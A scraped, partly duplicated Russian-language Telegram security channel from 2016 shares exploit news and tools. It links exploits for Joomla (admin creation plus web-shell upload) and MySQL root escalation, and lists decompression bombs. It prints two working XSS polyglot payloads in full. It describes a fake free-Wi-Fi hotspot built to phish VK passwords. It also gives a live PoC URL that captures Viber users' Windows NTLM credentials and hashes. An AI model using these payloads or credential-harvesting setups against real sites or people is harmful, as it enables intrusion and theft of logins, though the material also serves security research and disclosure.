Сегодня часть интернета не работает. Не удивляйтесь, если твиттер или гитхаб не откроется.
https://thehackernews.com/2016/10/dyn-dns-ddos.html
https://thehackernews.com/2016/10/dyn-dns-ddos.html
The Hacker News
Massive DDoS Attack Against Dyn DNS Service Knocks Popular Sites Offline
DDoS attack against the popular DNS service provider Dyn caused major outages to popular sites, including Twitter, Reddit, Github and Spotify.
❤🔥1
А если ты очень хочешь на ZeroNights, но внутренний еврей не позволяет тебе заплатить - го в волонтёры!
https://2016.zeronights.ru/news/zeronights-priglashaet-volonterov/
А ещё билет можно выиграть в hackquest'е
https://2016.zeronights.ru/news/vnimanie-skoro-zapuskaem-hackquest/
https://2016.zeronights.ru/news/zeronights-priglashaet-volonterov/
А ещё билет можно выиграть в hackquest'е
https://2016.zeronights.ru/news/vnimanie-skoro-zapuskaem-hackquest/
❤🔥1
Слышали про CVE-2016-8869 и CVE-2016-8870 в joomla?
А вот и рабочий эксплойт под joomla подъехал - создается администратор и заливается веб-шелл.
https://github.com/XiphosResearch/exploits/tree/master/Joomraa
А вот и рабочий эксплойт под joomla подъехал - создается администратор и заливается веб-шелл.
https://github.com/XiphosResearch/exploits/tree/master/Joomraa
GitHub
exploits/Joomraa at master · XiphosResearch/exploits
Miscellaneous exploit code. Contribute to XiphosResearch/exploits development by creating an account on GitHub.
❤🔥1
Кавычка
Слышали про CVE-2016-8869 и CVE-2016-8870 в joomla? А вот и рабочий эксплойт под joomla подъехал - создается администратор и заливается веб-шелл. https://github.com/XiphosResearch/exploits/tree/master/Joomraa
А все из-за того, что расширение pht может интерпритироваться также как php, php7, phtml, etc :)
https://telegram.me/bo0om_ru/45
https://telegram.me/bo0om_ru/45
Telegram
Bo0oM (канал)
Недавно наткнулся на расширение файла php7.
https://lab.onsec.ru/2016/04/new-php-extensions-should-be-hardcoded.html
https://lab.onsec.ru/2016/04/new-php-extensions-should-be-hardcoded.html
❤🔥1
В сети появился эксплойт под MySQL / MariaDB / PerconaDB - поднятие привелегий до root'а (опять race condition, ога).
https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
https://www.exploit-db.com/exploits/40679/
https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
https://www.exploit-db.com/exploits/40679/
❤🔥1
А как насчёт бомб? Приготовил небольшой сборник:
42.zip - классическая zip-бомба, занимающая в сжатом виде 42 килобайта, при постоянной распаковке, пока набор данных не достигнет верхнего предела распаковки в 4.3 гигабайта, будет занимать в памяти более 4.5 петабайт
r.zip - другой вариант zip-бомбы, с 1 директорией и архивом внутри
r.gz и r.tar.gz - аналогичные gzip-бомбы
droste.zip - zip архив который содержит изображение (чуть меньше 14 кб) и сам себя
spark.png.bz2 (420 байт) и распакованный spark.png - разжимается в изображение 225000х225000 пикcелей, который займет 141,4 ГБ в памяти
42.zip - классическая zip-бомба, занимающая в сжатом виде 42 килобайта, при постоянной распаковке, пока набор данных не достигнет верхнего предела распаковки в 4.3 гигабайта, будет занимать в памяти более 4.5 петабайт
r.zip - другой вариант zip-бомбы, с 1 директорией и архивом внутри
r.gz и r.tar.gz - аналогичные gzip-бомбы
droste.zip - zip архив который содержит изображение (чуть меньше 14 кб) и сам себя
spark.png.bz2 (420 байт) и распакованный spark.png - разжимается в изображение 225000х225000 пикcелей, который займет 141,4 ГБ в памяти
1
Универсаньные xss-вектора
Вектор с thespanner уже стал классическим, несколько лет назад о нем писал Raz0r. Отрабатывает в атрибутах, закрывает теги, покрывает bb-code, разворачивает изображение на весь экран с алертом
Менее короткий, но не менее интересный xss-полиглот, работает за счет множества комментов и имеет вложенные закрывающие теги (понравился подход), которые закрываются еденичным
Не покрывает только double encoding и html entities, но всё в твоих руках :)
Вектор с thespanner уже стал классическим, несколько лет назад о нем писал Raz0r. Отрабатывает в атрибутах, закрывает теги, покрывает bb-code, разворачивает изображение на весь экран с алертом
javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression(/*'/-/*',/**/eval(name)/*%2A///*///);width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"
Менее короткий, но не менее интересный xss-полиглот, работает за счет множества комментов и имеет вложенные закрывающие теги (понравился подход), которые закрываются еденичным
--!>
Не покрывает только double encoding и html entities, но всё в твоих руках :)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
❤🔥1
Помните, tlgm.ru был в XSS'ках от моего канала?
Вот новый парсер каналов подтянулся
https://tgram.ru/channels/bo0om_ru
Вот новый парсер каналов подтянулся
https://tgram.ru/channels/bo0om_ru
❤🔥1
RCE с помощью DNS запроса - изи катка.
Жаль, что самое интересное скрыли, через месяц появится в паблике полная версия, так что оставлю это здесь.
Жаль, что самое интересное скрыли, через месяц появится в паблике полная версия, так что оставлю это здесь.
❤🔥1
Forwarded from Hacker News
Опасный резолв. Разбираем на пальцах три мощных вектора атак через DNS
https://goo.gl/hDHNV3
https://goo.gl/hDHNV3
XAKEP
Опасный резолв. Разбираем на пальцах три мощных вектора атак через DNS
В эпоху появления доменных имен, когда людям стало лень запоминать IP-адреса для входа на тот или иной компьютер, были созданы те самые текстовые таблицы с алиасами IP-адресов. Но когда интернет начал распространяться по всему миру, доменов стало много и…
❤🔥1
Когда-то делал вот такую штуку на базе mr-3040, забавы ради. Под видом бесплатного вайфая (с mana) раздаётся точка доступа. Интернета, там, естественно нет, но мы об этом не говорим, а в качестве регистрации (или при попытке открыть любой сайт) нужно ввести логин и пароль к VK (который в любом случае скажет, что пароль неверный). Встроенного аккумулятора хватает на часов 5, размер меньше телефона, такая вот мобильная штука - ловушка для любителей халявы.
1
Сегодня в рамках ZeroNights расскажу доклад об способах и общих подходах к обходу современных защит веб-приложений и прочих мониторящих штук, которые становятся в разрезе между клиентом и сервером и мониторят HTTP трафик. Если кто там, велком :)
❤🔥1
Мои слайды с Zeronights 2016 | Удар ниже пояса. Обход современных WAF/IPS/DLP
https://www.slideshare.net/ssusera0a306/zeronights-2016-a-blow-under-the-belt-how-to-avoid-wafipsdlp-wafipsdlp
https://www.slideshare.net/ssusera0a306/zeronights-2016-a-blow-under-the-belt-how-to-avoid-wafipsdlp-wafipsdlp
SlideShare
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP - Download as a PDF or view online for free
❤🔥1
Никто и не заметил, а ребята из Казахстана на ZeroNights рассказали о классной фиче в Viber.
Когда в Viber кидаешь ссылку, он сначала идет туда HEAD запросом, но только по внешним адресам, проверяет, есть ли контент, если ему ответить - да, есть картинка, он идет за ней. А вот идет он с помощью бажного модуля, которым, например, внутренний ресурс поломать можно (SSRF). Но это еще цветочки.
Когда отвечаешь ему - "Здарова вайбер, а дай-ка мне логин и пароль от винды (NTLM Auth) " - он даёт)).
Вот вам PoC:
Отправив ссылку собеседнику в Viber под Windows, он увидит изображение со своим логином/доменом.
https://bo0om.ru/viber.php
Когда в Viber кидаешь ссылку, он сначала идет туда HEAD запросом, но только по внешним адресам, проверяет, есть ли контент, если ему ответить - да, есть картинка, он идет за ней. А вот идет он с помощью бажного модуля, которым, например, внутренний ресурс поломать можно (SSRF). Но это еще цветочки.
Когда отвечаешь ему - "Здарова вайбер, а дай-ка мне логин и пароль от винды (NTLM Auth) " - он даёт)).
Вот вам PoC:
Отправив ссылку собеседнику в Viber под Windows, он увидит изображение со своим логином/доменом.
https://bo0om.ru/viber.php
1
А лог отстуков вайбера (с хэшем, где в т.ч. пароль) можно посмотреть так https://bo0om.ru/viber.php?HelloViber
❤🔥1